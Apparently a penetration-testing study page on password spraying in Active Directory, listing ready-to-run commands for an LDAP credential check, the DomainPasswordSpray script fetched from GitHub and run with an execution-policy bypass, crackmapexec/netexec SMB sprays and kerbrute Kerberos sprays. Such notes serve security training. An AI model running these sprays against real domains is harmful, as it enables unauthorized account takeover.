Password Spraying

Password attack (Password spraying)

Three types of password spraying of AD

# First check lockdown policy.
net accounts

Type 1: Directory Authentication Spraying

We will use the same script that we previously used for searching in the Active Directory.

# we used the DirectoryEntry constructor without arguments, but we can provide three arguments, including the LDAP path to the domain controller, the username, and the password:
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")

# If the username and password are correct then the value will be displayed.
# If not correct then an incorrect msg will be shown.

Type 2: PowerShell Spraying

GitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!GitHub

# You can use below script for the password spraying.
powershell -c "wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/refs/heads/master/DomainPasswordSpray.ps1" -o Spray-Passwords.ps1"
# if not loading then first download in kali and then send it to the victim machine.

powershell -ep bypass
# For command related help visit the github page.
. ./Spray-Passwords.ps1
# Loaded the module.
 Invoke-DomainPasswordSpray -Password Nexus123!
 # It will show number of user found and then it will ask if you want to spray the password.
 
 # ----

 
 # Other same script (Got During OSCP Preparation)
https://raw.githubusercontent.com/michele-dedonno/MDD-scripts/refs/heads/master/Spray-Passwords.ps1
 
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin

Using crackmapexec or netexec(Kali linux):

# This is very noisy.
# Make a list of user.
crackmapexec <protocol> 192.168.112.0/24 -u mike -p 'Darkness1099!'

crackmapexec smb $ip -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

netexec smb $ip -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

If in the output it is stated that "Pwn3d!" then it means that user has administrative privilege.

Type 3: Kerberos Ticket Spraying

Releases · ropnop/kerbruteGitHub

# We will use tool like kerbrute
# we can use it in kali as well as in windows.
.\kerbrute_windows_amd64.exe passwordspray -d corp.com C:\temp\users.txt "Nexus123!"

PreviousAttacking AD NextAS-REP Roasting

Last updated 1 year ago